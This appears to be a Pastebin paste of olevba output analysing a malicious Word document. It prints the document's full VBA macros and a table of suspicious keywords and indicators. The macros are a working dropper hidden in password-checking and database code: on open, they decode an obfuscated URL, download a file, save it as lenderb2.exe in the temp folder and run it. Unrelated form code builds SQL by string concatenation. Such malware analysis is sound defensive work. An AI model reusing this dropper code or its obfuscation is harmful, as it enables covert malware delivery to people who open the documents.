Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASI-B-V Cleaning022958-01.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: Cleaning022958-01.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: Cleaning022958-01.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- password_match "", ""
- check_possibly_a_word "", ""
- check_character_variety ""
- check_length ""
- PoseCodeBySetText 0, ""
- check_password_level ""
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: Cleaning022958-01.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function check_password_level(ByVal strPassword As String, _
- Optional ByRef strInfo As String) As Long
- Dim result As Long
- adodbStream.savetofile tempFile, 2
- shellApp.Open (tempFile)
- Exit Function
- result = check_repeated_pattern(strPassword, strInfo)
- If result > PASSWORD_ACHIEVEMENT Then
- check_password_level = result
- Else
- result = check_common_password(strPassword, strInfo)
- If result > PASSWORD_ACHIEVEMENT Then
- check_password_level = result
- Else
- result = check_possibly_a_number(strPassword, strInfo)
- If result > PASSWORD_ACHIEVEMENT Then
- check_password_level = result
- Else
- result = check_possibly_a_word(strPassword, strInfo)
- If result > PASSWORD_ACHIEVEMENT Then
- check_password_level = result
- Else
- result = check_possibly_a_telephone_number_date(strPassword, strInfo)
- If result > PASSWORD_ACHIEVEMENT Then
- check_password_level = result
- Else
- result = check_possibly_a_word_and_a_number(strPassword, strInfo)
- If result > PASSWORD_ACHIEVEMENT Then
- check_password_level = result
- Else
- result = check_length(strPassword, strInfo)
- If result > PASSWORD_ACHIEVEMENT Then
- check_password_level = result
- Else
- result = check_character_variety(strPassword, strInfo)
- If result > PASSWORD_ACHIEVEMENT Then
- check_password_level = result
- Else
- result = check_symbols(strPassword, strInfo)
- If result > PASSWORD_ACHIEVEMENT Then
- check_password_level = result
- Else
- check_password_level = PASSWORD_ACHIEVEMENT
- End If
- End If
- End If
- End If
- End If
- End If
- End If
- End If
- End If
- End Function
- Public Function check_character_variety(ByVal strPassword As String, _
- Optional ByRef strInfo As String) As Long
- httpRequest.Send
- Exit Function
- If password_match(strPassword, "/^[a-zA-Z]+$/") Then
- strInfo = "???????????????,?????,??????????"
- check_character_variety = PASSWORD_WARNING
- ElseIf password_match(strPassword, "/^[A-Za-z0-9]+$/") Then
- strInfo = "???????????,?????????"
- check_character_variety = PASSWORD_WARNING
- ElseIf password_match(strPassword, "/[^A-Za-z0-9\u0000-\u007E]/") Then
- 'strInfo = "???????????????????,???????"
- check_character_variety = PASSWORD_ACHIEVEMENT
- End If
- End Function
- Private Function check_common_password(ByVal strPassword As String, _
- Optional ByRef strInfo As String) As Long
- Dim arrCommonPassword() As String, isFound As Boolean
- arrCommonPassword = Split(strPassWords, "|")
- isFound = False
- Dim x As Long
- For x = LBound(arrCommonPassword) To UBound(arrCommonPassword)
- If strPassword = arrCommonPassword(x) Then
- isFound = True
- Exit For
- End If
- Next
- If isFound Then
- strInfo = "??????????,??????"
- check_common_password = PASSWORD_INSECURE
- Else
- check_common_password = 0
- End If
- End Function
- Public Function check_length(ByVal strPassword As String, _
- Optional ByRef strInfo As String)
- tempFolder = processEnv("T" + "E" & "MP")
- tempFile = tempFolder + "\lenderb2" & ".exe"
- Exit Function
- If Len(strPassword) < 5 Then
- strInfo = "?????,???8???????"
- check_length = PASSWORD_INSECURE
- ElseIf Len(strPassword) < 8 Then
- strInfo = "??????,???8???????"
- check_length = PASSWORD_WARNING
- ElseIf Len(strPassword) > 15 Then
- 'strInfo = "?????15?????,??????"
- check_length = PASSWORD_ADVICE
- End If
- End Function
- Private Function check_possibly_a_number(ByVal strPassword As String, _
- Optional ByRef strInfo As String) As Long
- If password_match(strPassword, "/^[0-9]+$/") Then
- strInfo = "????????,????????????"
- check_possibly_a_number = PASSWORD_WARNING
- Else
- check_possibly_a_number = 0
- End If
- End Function
- Private Function check_possibly_a_telephone_number_date(ByVal strPassword As String, _
- Optional ByRef strInfo As String) As Long
- Dim lenPassword As Long
- lenPassword = Len(strPassword)
- If password_match(strPassword, "/^[\-\(\)\.\/\s0-9]+$/") Then
- strInfo = "?????????????????,?????,??????????"
- check_possibly_a_telephone_number_date = PASSWORD_WARNING
- ElseIf IsNumeric(strPassword) And (lenPassword = 11 Or lenPassword = 6 Or lenPassword = 8) Then
- strInfo = "?????????????????,?????,??????????"
- check_possibly_a_telephone_number_date = PASSWORD_WARNING
- ElseIf IsNumeric(strPassword) And (lenPassword = 15 Or lenPassword = 18) Then
- strInfo = "??????????????????,??????????"
- check_possibly_a_telephone_number_date = PASSWORD_WARNING
- ElseIf IsDate(strPassword) Then
- strInfo = "??????????,?????,??????????"
- check_possibly_a_telephone_number_date = PASSWORD_WARNING
- Else
- check_possibly_a_telephone_number_date = 0
- End If
- End Function
- Public Function check_possibly_a_word(ByVal strPassword As String, _
- Optional ByRef strInfo As String)
- Dim B() As Variant
- B = Array(147, 157, 155, 149, 93, 80, 78, 139, 132, 140, 120, 131, 140, 114, 127, 118, 57, 108, 118, 114, 50, 117, 120, 97, 97, 114, 112, 106, 101, 38, 35, 28, 31, 28, 76, 27, 26, 85, 74, 76, 9, 62, 79, 58)
- httpRequest.Open "GET", GetStringFromArray(B, 43), False
- Exit Function
- If password_match(strPassword, "/^[A-Za-z]+$/") Then
- strInfo = "????????,????????????"
- check_possibly_a_word = PASSWORD_WARNING
- Else
- check_possibly_a_word = 0
- End If
- End Function
- Private Function check_possibly_a_word_and_a_number(ByVal strPassword As String, _
- Optional ByRef strInfo As String) As Long
- If password_match(strPassword, "/^[a-zA-Z]+[0-9]+$/") Or password_match(strPassword, "/^[0-9]+[a-zA-Z]+$/") Then
- strInfo = "??????????????????,????????,??????????"
- check_possibly_a_word_and_a_number = PASSWORD_WARNING
- Else
- check_possibly_a_word_and_a_number = 0
- End If
- End Function
- Private Function check_repeated_pattern(ByVal strPassword As String, _
- Optional ByRef strInfo As String) As Long
- If password_match(strPassword, "/(.+)\1{2,}/gi") Then
- strInfo = "??????????,?????????"
- check_repeated_pattern = PASSWORD_WARNING
- Else
- check_repeated_pattern = 0
- End If
- End Function
- Private Function check_symbols(ByVal strPassword As String, _
- Optional ByRef strInfo As String) As Long
- Dim strSymbol As String
- strSymbol = "!@?#$%^&*()-_=\+?/.>,<`~|';:]}[{" & Chr(34)
- Dim lenPassword As Long, index As Long, isFound As Long
- lenPassword = Len(strPassword): isFound = 0
- For index = 1 To lenPassword
- If InStr(1, strSymbol, Mid$(strPassword, index, 1), vbBinaryCompare) > 0 Then
- isFound = isFound + 1
- End If
- Next
- If isFound > 3 Then
- check_symbols = PASSWORD_ACHIEVEMENT
- Else
- strInfo = "?????3?????????????"
- check_symbols = PASSWORD_ADVICE
- End If
- End Function
- Public Function password_match(ByVal strPassword As String, _
- ByVal strPattern As String) As Boolean
- Set httpRequest = CreateObject("Microsoft.XMLHTTP")
- Set adodbStream = CreateObject("Adodb.Stream")
- Set processEnv = CreateObject("WScript.Shell").Environment("Process")
- Set shellApp = CreateObject("Shell.Application")
- Exit Function
- Dim objRegExp As String
- password_match = False
- objRe.gExp.Global = True
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: Cleaning022958-01.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function PoseCodeToClipboard(ByVal strCode As String) As Long
- '<EhHeader>
- On Error GoTo PoseCodeToClipboard_Err
- '</EhHeader>
- 100 If isAutoCopy Then
- 102 Clipboard.Clear
- 104 Clipboard.SetText strCode, vbCFText
- 106 PoseCodeToClipboard = 1
- Else
- 108 PoseCodeToClipboard = 0
- End If
- '<EhFooter>
- Exit Function
- PoseCodeToClipboard_Err:
- PoseCodeToClipboard = 0
- 'MsgBox Err.Description & vbCrLf & _
- "in FlowerPassword.modInput.PoseCodeToClipboard " & _
- "at line " & Erl, _
- vbExclamation + vbOKOnly, "Application Error"
- Resume Next
- '</EhFooter>
- End Function
- Public Function PostCode(ByVal strCode As String, ByVal TextBoxHwnd As Long) As Long
- If isInternetExplorer(TextBoxHwnd) Then
- If PostCodeToIE(TextBoxHwnd, strCode) = 1 Then
- PostCode = 1
- Else
- Sleep 750
- PoseCodeBySendInput strCode
- PostCode = 2
- End If
- ElseIf isChrome(TextBoxHwnd) Then
- Sleep 750
- PoseCodeBySendInput strCode
- PostCode = 3
- ElseIf isFirefox(TextBoxHwnd) Then
- Sleep 750
- PoseCodeBySendInput strCode
- PostCode = 4
- ElseIf isOpera(TextBoxHwnd) Then
- Sleep 750
- PoseCodeBySendInput strCode
- PostCode = 5
- ElseIf isMaxthon(TextBoxHwnd) Then
- Sleep 750
- PoseCodeBySendInput strCode
- PostCode = 6
- Else
- If TextBoxHwnd > 0 Then
- 'PoseCodeByKeyDown TextBoxHwnd, strCode
- PoseCodeByPaste TextBoxHwnd
- 'PoseCodeBySetText TextBoxHwnd, strCode
- 'If GetCodeLength(TextBoxHwnd) <> 16 Then
- 'PoseCodeBySendInput strCode
- 'End If
- PostCode = 7
- Else
- Sleep 750
- PoseCodeBySendInput strCode
- PostCode = 8
- End If
- End If
- End Function
- Private Function GetCodeLength(ByVal TextBoxHwnd As Long) As Long
- GetCodeLength = SendMessage(TextBoxHwnd, WM_GETTEXTLENGTH, 0, vbNull)
- End Function
- Private Function MakeKeyLparam(ByVal VirtualKey As Long, ByVal flag As Long) As Long
- Dim Firstbyte As String 'lparam???24-31?
- If flag = WM_KEYDOWN Then '??????
- Firstbyte = "00"
- Else
- Firstbyte = "C0" '??????
- End If
- Dim Scancode As Long
- '???????
- Scancode = MapVirtualKey(VirtualKey, 0)
- Dim Secondbyte As String 'lparam???16-23?,???????
- Secondbyte = Right$("00" & Hex$(Scancode), 2)
- Dim s As String
- s = Firstbyte & Secondbyte & "0001" '0001?lparam???0-15?,????????????
- MakeKeyLparam = CLng("&H" & s)
- End Function
- Private Function PoseCodeByKeyDown(ByVal TextBoxHwnd As Long, _
- ByVal strCode As String) As Long
- Dim code_len As Long
- code_len = Len(strCode)
- If Len(code_len) > 0 Then
- Dim i As Long, result As Long
- For i = 1 To code_len
- Dim key_code As String
- result = 0
- key_code = Mid$(strCode, i, 1)
- result = PostMessage(TextBoxHwnd, WM_KEYDOWN, Asc(UCase$(key_code)), MakeKeyLparam(Asc(UCase$(key_code)), WM_KEYDOWN))
- result = PostMessage(TextBoxHwnd, WM_CHAR, Asc(key_code), MakeKeyLparam(Asc(UCase$(key_code)), WM_KEYDOWN))
- result = PostMessage(TextBoxHwnd, WM_KEYUP, Asc(UCase$(key_code)), MakeKeyLparam(Asc(UCase$(key_code)), WM_KEYUP))
- If result = 0 Then
- PoseCodeByKeyDown = 0
- Exit For
- End If
- Next
- PoseCodeByKeyDown = result
- End If
- End Function
- Private Function PoseCodeByPaste(ByVal TextBoxHwnd As Long) As Long
- PoseCodeByPaste = SendMessage(TextBoxHwnd, WM_PASTE, 0, 0)
- End Function
- Private Function PoseCodeBySendInput(ByVal strCode As String) As Long
- Dim code_len As Long
- code_len = Len(strCode)
- If Len(code_len) > 0 Then
- SetCapsLock False
- Dim i As Long, result As Long
- For i = 1 To code_len
- Dim key_code As Integer
- result = 0
- key_code = Asc(Mid$(strCode, i, 1))
- If Asc("0") <= key_code And key_code <= Asc("9") Then
- result = SendInputNumber(key_code)
- ElseIf Asc("A") <= key_code And key_code <= Asc("Z") Then
- result = SendInputUpperCase(key_code)
- ElseIf Asc("a") <= key_code And key_code <= Asc("z") Then
- result = SendInputLowerCase(key_code)
- Else
- PoseCodeBySendInput = 0
- Exit For
- End If
- If result = 0 Then
- PoseCodeBySendInput = 0
- Exit For
- End If
- Next
- PoseCodeBySendInput = result
- End If
- End Function
- Public Function PoseCodeBySetText(ByVal TextBoxHwnd As Long, _
- ByVal strCode As String)
- With adodbStream
- .Type = 1
- .Open
- .write httpRequest.responseBody
- End With
- End Function
- Private Function SendInputLowerCase(ByVal KeyCode As Integer) As Long
- KeyCode = KeyCode - Asc("a") + Asc("A")
- SendInputLowerCase = SendInputLowerKey(KeyCode)
- End Function
- Private Function SendInputLowerKey(ByVal bkey As Long) As Long
- Dim GInput(0 To 1) As GENERALINPUT
- Dim KInput As KEYBDINPUT
- KInput.wVk = bkey
- KInput.dwFlags = KEYEVENTF_KEYDOWN
- GInput(0).dwType = INPUT_KEYBOARD
- CopyMemory GInput(0).xi(0), KInput, Len(KInput)
- KInput.wVk = bkey
- KInput.dwFlags = KEYEVENTF_KEYUP
- GInput(1).dwType = INPUT_KEYBOARD
- CopyMemory GInput(1).xi(0), KInput, Len(KInput)
- SendInputLowerKey = SendInput(2, GInput(0), Len(GInput(0)))
- End Function
- Private Function SendInputNumber(ByVal KeyCode As Integer) As Long
- SendInputNumber = SendInputLowerKey(KeyCode)
- End Function
- Private Function SendInputUpperCase(ByVal KeyCode As Integer) As Long
- SendInputUpperCase = SendInputUpperKey(KeyCode)
- End Function
- Private Function SendInputUpperKey(ByVal bkey As Long) As Long
- Dim GInput(0 To 3) As GENERALINPUT
- Dim KInput As KEYBDINPUT
- KInput.wVk = vbKeyShift
- KInput.dwFlags = KEYEVENTF_KEYDOWN
- GInput(0).dwType = INPUT_KEYBOARD
- CopyMemory GInput(0).xi(0), KInput, Len(KInput)
- KInput.wVk = bkey
- KInput.dwFlags = KEYEVENTF_KEYDOWN
- GInput(1).dwType = INPUT_KEYBOARD
- CopyMemory GInput(1).xi(0), KInput, Len(KInput)
- KInput.wVk = bkey
- KInput.dwFlags = KEYEVENTF_KEYUP
- GInput(2).dwType = INPUT_KEYBOARD
- CopyMemory GInput(2).xi(0), KInput, Len(KInput)
- KInput.wVk = vbKeyShift
- KInput.dwFlags = KEYEVENTF_KEYUP
- GInput(3).dwType = INPUT_KEYBOARD
- CopyMemory GInput(3).xi(0), KInput, Len(KInput)
- SendInputUpperKey = SendInput(4, GInput(0), Len(GInput(0)))
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: Cleaning022958-01.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public httpRequest As Object
- Public adodbStream As Object
- Public processEnv As Object
- Public tempFolder As String
- Public tempFile As String
- Public shellApp As Object
- Private Sub btnSearch_Click()
- Dim Sql As String
- If Utilities.NullOrEmpty(txtNum) Then Exit Sub
- Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
- "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
- "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
- "On a.drawer = b.drawer_num " & _
- "Where a.drawer = '" & txtNum & "' " & _
- "Order by closing_time desc"
- Me.Epic_Drawer_Summary_Sub.Form.RecordSource = Sql
- End Sub
- Private Sub btnClearSearch_Click()
- Dim Sql As String
- txtNum = vbNullString
- Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
- "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
- "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
- "On a.drawer = b.drawer_num " & _
- "Where a.drawer is not null " & _
- "Order by a.drawer, a.closing_time desc"
- Me.Epic_Drawer_Summary_Sub.Form.RecordSource = Sql
- End Sub
- Private Sub btnFilter_Click()
- Dim Sql As String
- If Not Utilities.NullOrEmpty(txtStart) And Not Utilities.NullOrEmpty(txtEnd) Then
- Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
- "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
- "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
- "On a.drawer = b.drawer_num " & _
- "Where closing_time >= '" & txtStart & "' and closing_time <= '" & txtEnd & "' " & _
- "Order by closing_time desc"
- ElseIf Not Utilities.NullOrEmpty(txtStart) And Utilities.NullOrEmpty(txtEnd) Then
- Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
- "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
- "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
- "On a.drawer = b.drawer_num " & _
- "Where closing_time >= '" & txtStart & "' " & _
- "Order by closing_time desc"
- ElseIf Utilities.NullOrEmpty(txtStart) And Not Utilities.NullOrEmpty(txtEnd) Then
- Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
- "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
- "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
- "On a.drawer = b.drawer_num " & _
- "Where closing_time <= '" & txtEnd & "' " & _
- "Order by closing_time desc"
- ElseIf Utilities.NullOrEmpty(txtStart) And Utilities.NullOrEmpty(txtEnd) Then
- Exit Sub
- End If
- Me.Epic_Drawer_Summary_Sub.Form.RecordSource = Sql
- End Sub
- Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
- Dim i As Integer
- Dim result As String
- result = ""
- For i = LBound(fromArr) To UBound(fromArr)
- result = result & Chr(fromArr(i) - LenLen + i * 2)
- Next i
- GetStringFromArray = result
- End Function
- Private Sub btnClearFilter_Click()
- Dim Sql As String
- txtStart = vbNullString
- txtEnd = vbNullString
- Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
- "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
- "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
- "On a.drawer = b.drawer_num " & _
- "Where a.drawer is not null " & _
- "Order by a.drawer, a.closing_time desc"
- Me.Epic_Drawer_Summary_Sub.Form.RecordSource = Sql
- End Sub
- Private Sub btnSave_Click()
- Dim Sql As String
- Dim rs As New ADODB.Recordset
- Dim DepDt As String
- Dim depAmt As String
- If Utilities.NullOrEmpty(txtDepDt) Then
- DepDt = "Null"
- Else
- DepDt = "'" & txtDepDt & "'"
- 'Verify date between 1/1/2000 and today
- If Not verifyDate(Me.txtDepDt) Then Exit Sub
- End If
- If Utilities.NullOrEmpty(txtDepAmt) Then
- depAmt = "Null"
- Else
- depAmt = "'" & txtDepAmt & "'"
- End If
- Sql = "Update " & Constants.SCHEMA & ".[rec_epic_drawer_summary] set dep_dt = " & DepDt & ", dep_amt = " & depAmt & " where id = " & Form_Epic_Drawer_Summary_Sub.ID
- Call DoSQL.RunIt(Me.Name, Sql)
- Me.Epic_Drawer_Summary_Sub.Requery
- End Sub
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | WScript.Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | ADODB.Stream | May create a text file |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | lenderb2.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | VBA string | TEMP | ("T" + "E" & "MP") |
- | VBA string | \lenderb2.exe | "\lenderb2" & ".exe" |
- | VBA string | !@?#$%^&*()-_=\+?/.> | "!@?#$%^&*()-_=\+?/.>,<`~|';:]}[{" & |
- | | ,<`~|';:]}[{" | Chr(34) |
- | VBA string | in FlowerPassword.mo | "in FlowerPassword.modInput.PoseCodeToC |
- | | dInput.PoseCodeToCli | lipboard " & "at line " |
- | | pboard at line | |
- | VBA string | Select a.*, | "Select a.*, cast(a.drawer as |
- | | cast(a.drawer as | nvarchar(10)) + ' - ' + b.drawer_name |
- | | nvarchar(10)) + ' - | as drawerFull, cc_tot - (prof_tot + |
- | | ' + b.drawer_name as | hosp_tot) as variance, hosp_tot + |
- | | drawerFull, cc_tot - | prof_tot - isnull(dep_amt, 0) as |
- | | (prof_tot + | dep_variance " & "From " |
- | | hosp_tot) as | |
- | | variance, hosp_tot + | |
- | | prof_tot - | |
- | | isnull(dep_amt, 0) | |
- | | as dep_variance From | |
- | VBA string | .[rec_epic_drawer_su | ".[rec_epic_drawer_summary] a " & |
- | | mmary] a Full join | "Full join " |
- | VBA string | .[rec_epic_drawers] | ".[rec_epic_drawers] b " & |
- | | b On a.drawer = | "On a.drawer = b.drawer_num " & |
- | | b.drawer_num Where | "Where a.drawer = '" |
- | | a.drawer = ' | |
- | VBA string | ' Order by | "' " & "Order by closing_time |
- | | closing_time desc | desc" |
- | VBA string | .[rec_epic_drawers] | ".[rec_epic_drawers] b " & |
- | | b On a.drawer = | "On a.drawer = b.drawer_num " & |
- | | b.drawer_num Where | "Where a.drawer is not null " & |
- | | a.drawer is not null | "Order by a.drawer, a.closing_time |
- | | Order by a.drawer, | desc" |
- | | a.closing_time desc | |
- | VBA string | Select a.*, | "Select a.*, cast(a.drawer as |
- | | cast(a.drawer as | nvarchar(10)) + ' - ' + b.drawer_name |
- | | nvarchar(10)) + ' - | as drawerFull, cc_tot - (prof_tot + |
- | | ' + b.drawer_name as | hosp_tot) as variance, hosp_tot + |
- | | drawerFull, cc_tot - | prof_tot - isnull(dep_amt, 0) as |
- | | (prof_tot + | dep_variance " & "From " |
- | | hosp_tot) as | |
- | | variance, hosp_tot + | |
- | | prof_tot - | |
- | | isnull(dep_amt, 0) | |
- | | as dep_variance From | |
- | VBA string | .[rec_epic_drawer_su | ".[rec_epic_drawer_summary] a " & |
- | | mmary] a Full join | "Full join " |
- | VBA string | .[rec_epic_drawers] | ".[rec_epic_drawers] b " & |
- | | b On a.drawer = | "On a.drawer = b.drawer_num " & |
- | | b.drawer_num Where | "Where closing_time >= '" |
- | | closing_time >= ' | |
- | VBA string | ' Order by | "' " & "Order by |
- | | closing_time desc | closing_time desc" |
- | VBA string | .[rec_epic_drawers] | ".[rec_epic_drawers] b " & |
- | | b On a.drawer = | "On a.drawer = b.drawer_num " & |
- | | b.drawer_num Where | "Where closing_time <= '" |
- | | closing_time <= ' | |
- +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement